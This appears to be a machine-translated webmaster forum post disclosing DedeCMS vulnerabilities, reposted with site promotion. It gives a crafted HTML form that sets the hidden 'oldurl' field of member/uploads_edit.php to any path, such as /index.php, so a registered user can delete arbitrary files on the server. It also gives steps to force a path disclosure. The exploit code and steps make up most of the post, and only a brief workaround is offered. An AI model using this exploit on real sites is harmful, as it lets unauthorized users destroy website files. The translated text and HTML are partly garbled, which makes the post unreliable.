DEDECMS latest vulnerability to delete files arbitrarily

Intermediary transaction http://www.aliyun.com/zixun/aggregation/6858.html ">seo diagnose Taobao guest cloud host technology Hall

Dedecms The latest vulnerabilities, you can delete any file. Dede released the latest patches in May. But this patch doesn't work. Now release some bugs.

1. Delete any files on the website.

2. Show on Path

1. Delete any file.

Register a normal user ... Feel free to find a place to upload an attachment to OK.

Part of the code:

<form class= "mTB10 mL10 mR10" name= Form1 "action=" http://website address/member/uploads_edit.php "method=" POST "enctype=" Multipart/form-data ">
<input type= "hidden" name= "aid" value= "/>"
<input type= "hidden" name= "mediatype" value= "1"/>
<input type= "hidden" name= "Oldurl" value= "files to be deleted"/> <!--such as value= "/index.php" >
<input type= "hidden" name= "Dopost" value= "Save"/>
<table cellspacing= "1" class= "Submit" >

After the modification is complete. Open the HTML page. Direct point submission.

Then click Delete in the user admin attachment.

2. Explosion path.

It also uses the original HTML code.

<TD align= ' right ' valign= ' top ' > Replacement accessories:</td>
<td><input name= "Addonfile" type= "file" id= "Addonfile" style= "width:300px"/></td>
Delete type= "file". Save. Then open. Direct point submission.

You can explode the path.

Temporary workaround: Prohibit user from registering. Or prohibit users from sending attachments

Gather Station | Webmaster Information Exchange Group 84087572 Welcome everyone to come to exchange.

Start: Poly Station | Webmaster Information http://www.cnjz8.com If reproduced please retain the source.